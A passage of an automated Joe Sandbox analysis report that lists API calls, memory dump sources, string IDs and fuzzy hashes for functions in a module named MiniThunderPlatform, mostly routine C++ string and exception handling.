                                                                                                                                              • Opcode Fuzzy Hash: 92466aedf9ecdb0d1754a56b9401ba56b33810d1230a1fb8d230b3129055c7df
                                                                                                                                              • Instruction Fuzzy Hash: A3215E362083419FD314CB64C898AAFF7E8EFA9744F00491DF58A43292DB75A549CB63
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 1002C092
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1002C09D
                                                                                                                                                • Part of subcall function 1000F130: _ultoa.MSVCR71 ref: 1000F157
                                                                                                                                                • Part of subcall function 1000F130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1000F167
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1002C0C7
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0), ref: 1002C100
                                                                                                                                              Strings
                                                                                                                                              • WideCharToMultiByte call error, code:, xrefs: 1002C0B3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$V01@@$??0exception@@??1?$basic_string@?append@?$basic_string@ByteCharErrorExceptionH_prologLastMultiThrowV12@V12@@Wide_ultoa
                                                                                                                                              • String ID: WideCharToMultiByte call error, code:
                                                                                                                                              • API String ID: 1327079663-1874611114
                                                                                                                                              • Opcode ID: 924ee80860dff7a6395e3930a58e94195e360d3038da1eb9a2ef7a6c5af8a878
                                                                                                                                              • Instruction ID: f5ca69296ba0dca091106663d126832110e4c3740e56fe3cf692da88174db2fa
                                                                                                                                              • Opcode Fuzzy Hash: 924ee80860dff7a6395e3930a58e94195e360d3038da1eb9a2ef7a6c5af8a878
                                                                                                                                              • Instruction Fuzzy Hash: 1C118275104240AFE321DBA4DC49F9BBBE8FB59B44F50860DF55992281DB78A508CB72
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCR71(?,00000000,00000208,10311990), ref: 10011061
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,10311990), ref: 1001106B
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,10311990), ref: 1001107E
                                                                                                                                              • wcscpy.MSVCR71(1001138B,0000005C,?,?,10311990), ref: 100110BA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Module$FileHandleNamememsetwcscpy
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 2319185427-2967466578
                                                                                                                                              • Opcode ID: 21a6e733fe72a8e0d89d6a137cf1f4f2bd3a70af9ac86e90b66769d7bf5a28ad
                                                                                                                                              • Instruction ID: f7bd7b91f63326efba3cfb8ce623a8d9ce10a874099c6e754b7b46ac32cf4be4
                                                                                                                                              • Opcode Fuzzy Hash: 21a6e733fe72a8e0d89d6a137cf1f4f2bd3a70af9ac86e90b66769d7bf5a28ad
                                                                                                                                              • Instruction Fuzzy Hash: 3A01D671E00218EBDB19DBA0DC4DBDD33A8EF0C315F504659E515CA0D2EBB1DAC48B51
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 100E10B1
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100E10C3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100E10DE
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100E10FB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: b30836a936606d9f8410397372d82ea8a92e8c95af505c9c7349d06f94935257
                                                                                                                                              • Instruction ID: 0aba9ac9af92d6eedb8bd28daff53a4c0a53a7e73e01bd7618f21e88c996ae9f
                                                                                                                                              • Opcode Fuzzy Hash: b30836a936606d9f8410397372d82ea8a92e8c95af505c9c7349d06f94935257
                                                                                                                                              • Instruction Fuzzy Hash: 2601E4B4008281DFC320DF54C998B5ABBE4FB5D708F108A4CF49A87690D776A519CF22
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10080061
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10080073
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1008008E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100800AB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: e6655c3448a2bdc650e6f244d2b9f6b718284dd7009dddb7059d61ef251e4b13
                                                                                                                                              • Instruction ID: 44ea750377cd67bbda49f5cdab0d6303e054668bcb414c175ac8284b0608dc2b
                                                                                                                                              • Opcode Fuzzy Hash: e6655c3448a2bdc650e6f244d2b9f6b718284dd7009dddb7059d61ef251e4b13
                                                                                                                                              • Instruction Fuzzy Hash: 75F017B10082919FC325DF54C84CB5BBBE4FB6D708F408A0CF4AA92680D7B69109CF23
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long,?,?,?,?,?,?,?,?,?,?,1024AB32,000000FF,10096040,?,00000020), ref: 100940E1
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100940F3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1009410E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1009412B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
• Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: c20c4a56a80cae5fceb4a8170d49cf6e9a5572845a1faa3bddd4c73a2813acda
                                                                                                                                              • Instruction ID: 794648e12ff78e182a2ed5275bf697a7bdde7b63e20b13f57bbda3f7476d6d41
                                                                                                                                              • Opcode Fuzzy Hash: c20c4a56a80cae5fceb4a8170d49cf6e9a5572845a1faa3bddd4c73a2813acda
                                                                                                                                              • Instruction Fuzzy Hash: 75F0F4B10082819FC325DF54C84CB5ABBE4FB6D708F408A0CF4AA92680C7769109CF23
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 100091A1
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100091B3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100091CE
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100091EB
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: 966fbdebdbe0c95763270b6d4488c7f000a15184868894c892b8a1f4e786fad6
                                                                                                                                              • Instruction ID: 526898142a79738013431e79881c7124326718d0408f4a7664e14303b6898670
                                                                                                                                              • Opcode Fuzzy Hash: 966fbdebdbe0c95763270b6d4488c7f000a15184868894c892b8a1f4e786fad6
                                                                                                                                              • Instruction Fuzzy Hash: 8BF0F4B10082819FC321DB54C84CB5ABBE4FB6D709F408A0CF4AA52680C77A9109CF23
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10085201
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10085213
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1008522E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1008524B
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: 5e1764e3cc5cd767f029897600890de77f7a0aa55b52eb6240143e3d3da8313c
                                                                                                                                              • Instruction ID: 600ad6008c29ac98e185794c1c61ff26b3c89d1394ac4b556b4b601005856f2c
                                                                                                                                              • Opcode Fuzzy Hash: 5e1764e3cc5cd767f029897600890de77f7a0aa55b52eb6240143e3d3da8313c
                                                                                                                                              • Instruction Fuzzy Hash: CFF017B10082819FC325DF64C84CB5BBBE4FB6D708F408A0CF4AA92680D7769109CF23
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10060371
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10060383
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1006039E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100603BB
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: ed47d064897ddc694b3ccccc7af98bcf8584c0640ad7df881db81f28ab35ddb1
                                                                                                                                              • Instruction ID: c4f26eda1930d1fc0f25cf00291cef08e894f958d409cefbcb0418c7acdc0dce
                                                                                                                                              • Opcode Fuzzy Hash: ed47d064897ddc694b3ccccc7af98bcf8584c0640ad7df881db81f28ab35ddb1
                                                                                                                                              • Instruction Fuzzy Hash: FCF0F4B10082919FC325DB94C84CB5ABBE4FB6D708F408A0CF4AA92680C7769109CF23
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(deque<T> too long,?,?,?,?,?,?,?,?,?,?,?,?,10246622,000000FF,10068910), ref: 10068401
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10068413
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1006842E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1006844B
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: deque<T> too long
                                                                                                                                              • API String ID: 113201077-309773918
                                                                                                                                              • Opcode ID: 286ff7d1d792b442532c5e472fc7082cabd1c33ef9cb0728840e9f0129aa02be
                                                                                                                                              • Instruction ID: 9cc61e7f4038a94c5d9db9b22f429675163429a1e483fd8132820c18e578de3d
                                                                                                                                              • Opcode Fuzzy Hash: 286ff7d1d792b442532c5e472fc7082cabd1c33ef9cb0728840e9f0129aa02be
                                                                                                                                              • Instruction Fuzzy Hash: AEF0F4710082819FC325DB54C85CB5ABBE8FB69708F448A0CF4AA92680CB7A9109CF23
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10079651
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10079663
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1007967E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1007969B
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: a664b59c4351160bb4c87f6fcb3926645d0448a2b931a580f68465f5a3e16753
                                                                                                                                              • Instruction ID: 875b51f043f68d75cd0ad055408fc7f5bb61944d4fd079367e3ebb2d3d1a5907
                                                                                                                                              • Opcode Fuzzy Hash: a664b59c4351160bb4c87f6fcb3926645d0448a2b931a580f68465f5a3e16753
                                                                                                                                              • Instruction Fuzzy Hash: EDF017B10082819FC325DF64C84CB5BBBE4FB6D708F408A0CF4AA92680D7B69109CF23
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100240B2
                                                                                                                                                • Part of subcall function 10023F17: RtlEnterCriticalSection.NTDLL(?), ref: 10023F26
                                                                                                                                                • Part of subcall function 1002B40C: __EH_prolog.LIBCMT ref: 1002B411
                                                                                                                                                • Part of subcall function 1002B40C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1002B427
                                                                                                                                                • Part of subcall function 1002B40C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(000000A1), ref: 1002B445
                                                                                                                                                • Part of subcall function 1002B0FA: __EH_prolog.LIBCMT ref: 1002B0FF
                                                                                                                                                • Part of subcall function 1002B0FA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,100240E7,name), ref: 1002B12C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?,?,name), ref: 100240F6
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8,?,name), ref: 10024107
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10024114
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog$??0?$basic_string@CriticalSectionV12@$??1?$basic_string@?assign@?$basic_string@?erase@?$basic_string@EnterLeave
                                                                                                                                              • String ID: name
                                                                                                                                              • API String ID: 1821285802-1579384326
                                                                                                                                              • Opcode ID: f96494a5bae32689231862239f6493cbde9c8c5ee9dd51eb13ebcebb5ec0c6ca
                                                                                                                                              • Instruction ID: 97a4195677eae456c580f8663cc7e3a8ca962814831b1d3c6d986e44943e16ee
                                                                                                                                              • Opcode Fuzzy Hash: f96494a5bae32689231862239f6493cbde9c8c5ee9dd51eb13ebcebb5ec0c6ca
                                                                                                                                              • Instruction Fuzzy Hash: 2F016D31600224EBDB25DFA4DC8DBAD77B1EF58704F408518F416DB291CF35A998CB40
                                                                                                                                              APIs
                                                                                                                                              • ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71 ref: 10010151
                                                                                                                                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?), ref: 10010169
                                                                                                                                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?), ref: 100101CB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100101E1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10010212
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@?end@?$basic_string@Vconst_iterator@12@$?rend@?$basic_string@D@2@@std@@@2@V?$reverse_iterator@Vconst_iterator@?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 656074548-0
                                                                                                                                              • Opcode ID: 5639019ffcc4e36130cd9dc3d2bff3e9b60db65f26e53f220d62165f038a5c4e
                                                                                                                                              • Instruction ID: cf1d596a02910a438575f39714d247df8715404e76c0658a6d7bd2396e41c723
                                                                                                                                              • Opcode Fuzzy Hash: 5639019ffcc4e36130cd9dc3d2bff3e9b60db65f26e53f220d62165f038a5c4e
                                                                                                                                              • Instruction Fuzzy Hash: D3318075608281AFC714CF24C499A9EBBE1FB9A350F544A0DF8D147292D778E48ACB62
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C273
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71 ref: 1009C291
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C2A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C2D5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C30B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$V01@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 548707936-0
                                                                                                                                              • Opcode ID: dd095616a7be10f5896f88361f07ec8a856e8e6518b237366c9ea49680915787
                                                                                                                                              • Instruction ID: 3380ac30875310ebd9ea7085bbbe6fce60302cb11d937a0e6fb7e1aa8a1a8cc6
                                                                                                                                              • Opcode Fuzzy Hash: dd095616a7be10f5896f88361f07ec8a856e8e6518b237366c9ea49680915787
                                                                                                                                              • Instruction Fuzzy Hash: 48219F765087909FC321CF94C84CB9AFBE4FB9E760F544A4DF4AA83291DB74A448CB12
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V01@@$??1?$basic_string@?append@?$basic_string@H_prologV12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3261824692-0
